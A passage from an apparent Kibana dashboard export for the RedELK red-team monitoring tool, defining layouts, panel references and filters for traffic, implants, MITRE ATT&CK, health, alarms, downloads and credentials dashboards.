backend\",\"panelRefName\":\"panel_c630a33e-6a98-466d-8223-fd83e6947b8c\"},{\"version\":\"7.10.0\",\"type\":\"map\",\"gridData\":{\"h\":15,\"i\":\"1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\",\"w\":24,\"x\":0,\"y\":7},\"panelIndex\":\"1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\",\"embeddableConfig\":{\"hiddenLayers\":[],\"hidePanelTitles\":false,\"isLayerTOCOpen\":false,\"mapCenter\":{\"lat\":14.5701,\"lon\":121.0254,\"zoom\":17},\"openTOCDetails\":[],\"enhancements\":{}},\"title\":\"HTTP redir traffic map\",\"panelRefName\":\"panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"h\":15,\"i\":\"fc254327-57ac-4e5f-88f7-a32d48570289\",\"w\":24,\"x\":24,\"y\":7},\"panelIndex\":\"fc254327-57ac-4e5f-88f7-a32d48570289\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{}},\"title\":\"HTTP Redir traffic over time\",\"panelRefName\":\"panel_fc254327-57ac-4e5f-88f7-a32d48570289\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"h\":15,\"i\":\"829f61cf-9374-4bb5-8214-34e6875e79da\",\"w\":24,\"x\":0,\"y\":22},\"panelIndex\":\"829f61cf-9374-4bb5-8214-34e6875e79da\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_829f61cf-9374-4bb5-8214-34e6875e79da\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"h\":22,\"i\":\"0bc5f60b-f940-451a-886b-edff3512d180\",\"w\":48,\"x\":0,\"y\":37},\"panelIndex\":\"0bc5f60b-f940-451a-886b-edff3512d180\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_0bc5f60b-f940-451a-886b-edff3512d180\"}]", "refreshInterval": {"pause": false, "value": 30000}, "timeFrom": "now-1d", "timeRestore": true, "timeTo": "now", "title": "RedELK - Traffic dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "948c1286-d4de-44a6-8fb2-95bf9252ed00:panel_948c1286-d4de-44a6-8fb2-95bf9252ed00", "type": "visualization"}, {"id": "56350050-efe7-11eb-8a9f-2572da287875", "name": "ab9eb0fb-a164-4295-8177-865a2a67dccb:panel_ab9eb0fb-a164-4295-8177-865a2a67dccb", "type": "visualization"}, {"id": "d625ba60-efe8-11eb-8a9f-2572da287875", "name": "c630a33e-6a98-466d-8223-fd83e6947b8c:panel_c630a33e-6a98-466d-8223-fd83e6947b8c", "type": "visualization"}, {"id": "dd9e9510-efec-11eb-8a9f-2572da287875", "name": "1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a:panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", "type": "map"}, {"id": "be08d380-efe9-11eb-8a9f-2572da287875", "name": "fc254327-57ac-4e5f-88f7-a32d48570289:panel_fc254327-57ac-4e5f-88f7-a32d48570289", "type": "visualization"}, {"id": "cbb7d710-efee-11eb-8a9f-2572da287875", "name": "829f61cf-9374-4bb5-8214-34e6875e79da:panel_829f61cf-9374-4bb5-8214-34e6875e79da", "type": "visualization"}, {"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "0bc5f60b-f940-451a-886b-edff3512d180:panel_0bc5f60b-f940-451a-886b-edff3512d180", "type": "search"}], "sort": [1645363347725, 1518], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK implants dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"tags\",\"params\":{\"query\":\"sandboxes_v01\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"sandboxes_v01\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"tags\",\"params\":{\"query\":\"testsystems_v01\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"testsystems_v01\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "optionsJSON": "{\"darkTheme\":false,\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":15,\"i\":\"1\"},\"panelIndex\":\"1\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":24,\"h\":15,\"i\":\"2\"},\"panelIndex\":\"2\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_2\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":17,\"w\":24,\"h\":15,\"i\":\"3\"},\"panelIndex\":\"3\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_3\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":32,\"w\":48,\"h\":22,\"i\":\"4\"},\"panelIndex\":\"4\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_4\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":17,\"w\":24,\"h\":15,\"i\":\"5\"},\"panelIndex\":\"5\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_5\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"a5e43e90-aa23-403a-9167-bfe8aff7fb6c\"},\"panelIndex\":\"a5e43e90-aa23-403a-9167-bfe8aff7fb6c\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_a5e43e90-aa23-403a-9167-bfe8aff7fb6c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":54,\"w\":48,\"h\":19,\"i\":\"b9915fcd-f22e-4326-986a-25684f947b79\"},\"panelIndex\":\"b9915fcd-f22e-4326-986a-25684f947b79\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_b9915fcd-f22e-4326-986a-25684f947b79\"}]", "refreshInterval": {"pause": false, "value": 30000}, "timeFrom": "now-30d", "timeRestore": true, "timeTo": "now", "title": "RedELK - Implants dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "117dbba0-c6f5-11e8-a9c6-cd307b96b1ba", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", "name": "1:panel_1", "type": "visualization"}, {"id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", "name": "2:panel_2", "type": "visualization"}, {"id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", "name": "3:panel_3", "type": "visualization"}, {"id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", "name": "4:panel_4", "type": "visualization"}, {"id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", "name": "5:panel_5", "type": "visualization"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "a5e43e90-aa23-403a-9167-bfe8aff7fb6c:panel_a5e43e90-aa23-403a-9167-bfe8aff7fb6c", "type": "visualization"}, {"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "b9915fcd-f22e-4326-986a-25684f947b79:panel_b9915fcd-f22e-4326-986a-25684f947b79", "type": "search"}], "sort": [1645363347725, 1528], "type": "dashboard", "version": "1"} +{"attributes": {"description": "MITRE ATT&CK dashboard showing TTPs used (SIEM detection must be configured first)", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":21,\"h\":17,\"i\":\"e4271670-160e-444d-bb78-46ae1e1c7339\"},\"panelIndex\":\"e4271670-160e-444d-bb78-46ae1e1c7339\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"MITRE ATT&CK Tactics\",\"panelRefName\":\"panel_e4271670-160e-444d-bb78-46ae1e1c7339\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":21,\"y\":2,\"w\":27,\"h\":17,\"i\":\"6b3738e3-3bd8-417f-866a-f7c990b0b6f8\"},\"panelIndex\":\"6b3738e3-3bd8-417f-866a-f7c990b0b6f8\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"MITRE ATT&CK Techniques\",\"panelRefName\":\"panel_6b3738e3-3bd8-417f-866a-f7c990b0b6f8\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":19,\"w\":24,\"h\":15,\"i\":\"de3ced26-2a55-43f5-af28-dc5c2b967c29\"},\"panelIndex\":\"de3ced26-2a55-43f5-af28-dc5c2b967c29\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_de3ced26-2a55-43f5-af28-dc5c2b967c29\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":19,\"w\":24,\"h\":15,\"i\":\"38e24827-8707-4583-805a-98e4138495a7\"},\"panelIndex\":\"38e24827-8707-4583-805a-98e4138495a7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_38e24827-8707-4583-805a-98e4138495a7\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":34,\"w\":48,\"h\":15,\"i\":\"60dc249a-1ad0-456c-850b-95c77ea0bc18\"},\"panelIndex\":\"60dc249a-1ad0-456c-850b-95c77ea0bc18\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_60dc249a-1ad0-456c-850b-95c77ea0bc18\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"3b895da0-50d0-49e0-a18d-790fd2dddaaa\"},\"panelIndex\":\"3b895da0-50d0-49e0-a18d-790fd2dddaaa\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_3b895da0-50d0-49e0-a18d-790fd2dddaaa\"}]", "timeRestore": false, "title": "RedELK - MITRE ATT&CK", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "3ed7a630-d051-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", "name": "e4271670-160e-444d-bb78-46ae1e1c7339:panel_e4271670-160e-444d-bb78-46ae1e1c7339", "type": "visualization"}, {"id": "abdcd940-d050-11ea-9301-a30a04251ae9", "name": "6b3738e3-3bd8-417f-866a-f7c990b0b6f8:panel_6b3738e3-3bd8-417f-866a-f7c990b0b6f8", "type": "visualization"}, {"id": "2f5a2760-d050-11ea-9301-a30a04251ae9", "name": "de3ced26-2a55-43f5-af28-dc5c2b967c29:panel_de3ced26-2a55-43f5-af28-dc5c2b967c29", "type": "visualization"}, {"id": "231792d0-d050-11ea-9301-a30a04251ae9", "name": "38e24827-8707-4583-805a-98e4138495a7:panel_38e24827-8707-4583-805a-98e4138495a7", "type": "visualization"}, {"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "60dc249a-1ad0-456c-850b-95c77ea0bc18:panel_60dc249a-1ad0-456c-850b-95c77ea0bc18", "type": "search"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "3b895da0-50d0-49e0-a18d-790fd2dddaaa:panel_3b895da0-50d0-49e0-a18d-790fd2dddaaa", "type": "visualization"}], "sort": [1645363347725, 1535], "type": "dashboard", "version": "1"} +{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"5f3b82fd-613e-460e-a5a3-b7a9c9036060\"},\"panelIndex\":\"5f3b82fd-613e-460e-a5a3-b7a9c9036060\",\"embeddableConfig\":{\"hidePanelTitles\":true,\"enhancements\":{}},\"panelRefName\":\"panel_5f3b82fd-613e-460e-a5a3-b7a9c9036060\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":48,\"h\":2,\"i\":\"cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\"},\"panelIndex\":\"cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\",\"embeddableConfig\":{\"hidePanelTitles\":true,\"enhancements\":{}},\"panelRefName\":\"panel_cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":4,\"w\":16,\"h\":7,\"i\":\"cd30bef4-7955-437a-adaf-317839c35931\"},\"panelIndex\":\"cd30bef4-7955-437a-adaf-317839c35931\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cd30bef4-7955-437a-adaf-317839c35931\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":16,\"y\":4,\"w\":21,\"h\":18,\"i\":\"cc62352b-f1ed-47fb-9687-d51a44693d13\"},\"panelIndex\":\"cc62352b-f1ed-47fb-9687-d51a44693d13\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cc62352b-f1ed-47fb-9687-d51a44693d13\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":37,\"y\":4,\"w\":11,\"h\":18,\"i\":\"1d8af391-0559-412f-a001-12acc85b49ab\"},\"panelIndex\":\"1d8af391-0559-412f-a001-12acc85b49ab\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1d8af391-0559-412f-a001-12acc85b49ab\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":11,\"w\":16,\"h\":11,\"i\":\"cd45ce11-0279-476b-90c3-bd5733193a72\"},\"panelIndex\":\"cd45ce11-0279-476b-90c3-bd5733193a72\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cd45ce11-0279-476b-90c3-bd5733193a72\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":22,\"w\":48,\"h\":16,\"i\":\"aa8ee839-556c-47ce-81af-451090b86f71\"},\"panelIndex\":\"aa8ee839-556c-47ce-81af-451090b86f71\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_aa8ee839-556c-47ce-81af-451090b86f71\"}]", "refreshInterval": {"pause": true, "value": 0}, "timeFrom": "now-15y", "timeRestore": true, "timeTo": "now", "title": "RedELK - Health", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "509e6a80-926a-11eb-a753-9da683898c26", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "5f3b82fd-613e-460e-a5a3-b7a9c9036060:panel_5f3b82fd-613e-460e-a5a3-b7a9c9036060", "type": "visualization"}, {"id": "45491770-0886-11eb-a2d2-171dc8941414", "name": "cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2:panel_cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2", "type": "visualization"}, {"id": "20fac240-926c-11eb-a753-9da683898c26", "name": "cd30bef4-7955-437a-adaf-317839c35931:panel_cd30bef4-7955-437a-adaf-317839c35931", "type": "visualization"}, {"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "cc62352b-f1ed-47fb-9687-d51a44693d13:panel_cc62352b-f1ed-47fb-9687-d51a44693d13", "type": "search"}, {"id": "2f971ac0-926b-11eb-a753-9da683898c26", "name": "1d8af391-0559-412f-a001-12acc85b49ab:panel_1d8af391-0559-412f-a001-12acc85b49ab", "type": "visualization"}, {"id": "2f77a150-926a-11eb-a753-9da683898c26", "name": "cd45ce11-0279-476b-90c3-bd5733193a72:panel_cd45ce11-0279-476b-90c3-bd5733193a72", "type": "visualization"}, {"id": "654f76a0-9269-11eb-a753-9da683898c26", "name": "aa8ee839-556c-47ce-81af-451090b86f71:panel_aa8ee839-556c-47ce-81af-451090b86f71", "type": "search"}], "sort": [1645363347725, 1543], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK alarms dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":18,\"h\":11,\"i\":\"74b481ca-ae10-4039-b6bf-474b5a409c0e\"},\"panelIndex\":\"74b481ca-ae10-4039-b6bf-474b5a409c0e\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed IOC over time\",\"panelRefName\":\"panel_74b481ca-ae10-4039-b6bf-474b5a409c0e\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":18,\"y\":2,\"w\":6,\"h\":11,\"i\":\"13abf5b9-28bf-4d51-9c63-2416603499e7\"},\"panelIndex\":\"13abf5b9-28bf-4d51-9c63-2416603499e7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_13abf5b9-28bf-4d51-9c63-2416603499e7\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":6,\"h\":11,\"i\":\"e146bc43-4ec7-4fbb-8dcf-3df505b52932\"},\"panelIndex\":\"e146bc43-4ec7-4fbb-8dcf-3df505b52932\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_e146bc43-4ec7-4fbb-8dcf-3df505b52932\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":30,\"y\":2,\"w\":18,\"h\":11,\"i\":\"c8ae192f-f081-49eb-8e60-3122d0377314\"},\"panelIndex\":\"c8ae192f-f081-49eb-8e60-3122d0377314\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed traffic over time\",\"panelRefName\":\"panel_c8ae192f-f081-49eb-8e60-3122d0377314\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":14,\"i\":\"b95813af-9600-4e44-93de-9acfaa6f911c\"},\"panelIndex\":\"b95813af-9600-4e44-93de-9acfaa6f911c\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed IOC\",\"panelRefName\":\"panel_b95813af-9600-4e44-93de-9acfaa6f911c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":27,\"w\":48,\"h\":17,\"i\":\"67fd9bda-6d1a-4089-a588-b683ad113558\"},\"panelIndex\":\"67fd9bda-6d1a-4089-a588-b683ad113558\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed traffic\",\"panelRefName\":\"panel_67fd9bda-6d1a-4089-a588-b683ad113558\"}]", "timeRestore": false, "title": "RedELK - Alarms dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "53b69200-d4e3-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", "name": "74b481ca-ae10-4039-b6bf-474b5a409c0e:panel_74b481ca-ae10-4039-b6bf-474b5a409c0e", "type": "visualization"}, {"id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "name": "13abf5b9-28bf-4d51-9c63-2416603499e7:panel_13abf5b9-28bf-4d51-9c63-2416603499e7", "type": "visualization"}, {"id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "name": "e146bc43-4ec7-4fbb-8dcf-3df505b52932:panel_e146bc43-4ec7-4fbb-8dcf-3df505b52932", "type": "visualization"}, {"id": "f7141500-d4e1-11ea-9301-a30a04251ae9", "name": "c8ae192f-f081-49eb-8e60-3122d0377314:panel_c8ae192f-f081-49eb-8e60-3122d0377314", "type": "visualization"}, {"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "b95813af-9600-4e44-93de-9acfaa6f911c:panel_b95813af-9600-4e44-93de-9acfaa6f911c", "type": "search"}, {"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "67fd9bda-6d1a-4089-a588-b683ad113558:panel_67fd9bda-6d1a-4089-a588-b683ad113558", "type": "search"}], "sort": [1645363347725, 1551], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK downloads dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "optionsJSON": "{\"useMargins\":true,\"hidePanelTitles\":false}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":2,\"w\":17,\"h\":11,\"i\":\"55aca97f-b1f0-43b1-af44-756fe59be5fc\"},\"panelIndex\":\"55aca97f-b1f0-43b1-af44-756fe59be5fc\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_55aca97f-b1f0-43b1-af44-756fe59be5fc\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":11,\"i\":\"8375955c-eab4-48d9-ac8a-e4de3dd6fab2\"},\"panelIndex\":\"8375955c-eab4-48d9-ac8a-e4de3dd6fab2\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":7,\"h\":11,\"i\":\"1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\"},\"panelIndex\":\"1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":16,\"i\":\"9a987436-c698-4236-9b92-bfab81de8cc1\"},\"panelIndex\":\"9a987436-c698-4236-9b92-bfab81de8cc1\",\"embeddableConfig\":{\"sort\":[\"@timestamp\",\"desc\",[\"@timestamp\",\"desc\"]],\"enhancements\":{}},\"panelRefName\":\"panel_9a987436-c698-4236-9b92-bfab81de8cc1\"}]", "timeRestore": false, "title": "RedELK - Downloads dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "643de010-d04c-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", "name": "55aca97f-b1f0-43b1-af44-756fe59be5fc:panel_55aca97f-b1f0-43b1-af44-756fe59be5fc", "type": "visualization"}, {"id": "85446c80-d04b-11ea-9301-a30a04251ae9", "name": "8375955c-eab4-48d9-ac8a-e4de3dd6fab2:panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2", "type": "visualization"}, {"id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "name": "1e1864e7-1cbf-41bf-a9a5-8afadce8cadf:panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", "type": "visualization"}, {"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "9a987436-c698-4236-9b92-bfab81de8cc1:panel_9a987436-c698-4236-9b92-bfab81de8cc1", "type": "search"}], "sort": [1645363347725, 1557], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK credentials dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"w\":48,\"x\":0,\"y\":0},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":11,\"i\":\"f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\"},\"panelIndex\":\"f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Credentials over time\",\"panelRefName\":\"panel_f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":7,\"h\":11,\"i\":\"8c5ea210-ef6d-47a3-958b-16ccc6006582\"},\"panelIndex\":\"8c5ea210-ef6d-47a3-958b-16ccc6006582\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Total credentials\",\"panelRefName\":\"panel_8c5ea210-ef6d-47a3-958b-16ccc6006582\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":2,\"w\":17,\"h\":11,\"i\":\"b98cc0b8-ee93-4d34-b458-cd311eb995ea\"},\"panelIndex\":\"b98cc0b8-ee93-4d34-b458-cd311eb995ea\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Credentials realms\",\"panelRefName\":\"panel_b98cc0b8-ee93-4d34-b458-cd311eb995ea\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":19,\"i\":\"77f94499-3c4b-49c0-8379-62d38f4d7d8e\"},\"panelIndex\":\"77f94499-3c4b-49c0-8379-62d38f4d7d8e\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_77f94499-3c4b-49c0-8379-62d38f4d7d8e\"}]", "timeRestore": false, "title": "RedELK - Credentials dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "82b865a0-d318-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "ab609c60-d319-11ea-9301-a30a04251ae9", "name": "f26413a8-7bc3-4d63-8e2e-02d1c8e06b51:panel_f26413a8-7bc3-4d63-8e2e-02d1c8e06b51", "type": "visualization"}, {"id": "dcf86190-d319-11ea-9301-a30a04251ae9", "name": "8c5ea210-ef6d-47a3-958b-16ccc6006582:panel_8c5ea210-ef6d-47a3-958b-16ccc6006582", "type": "visualization"}, {"id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "name": 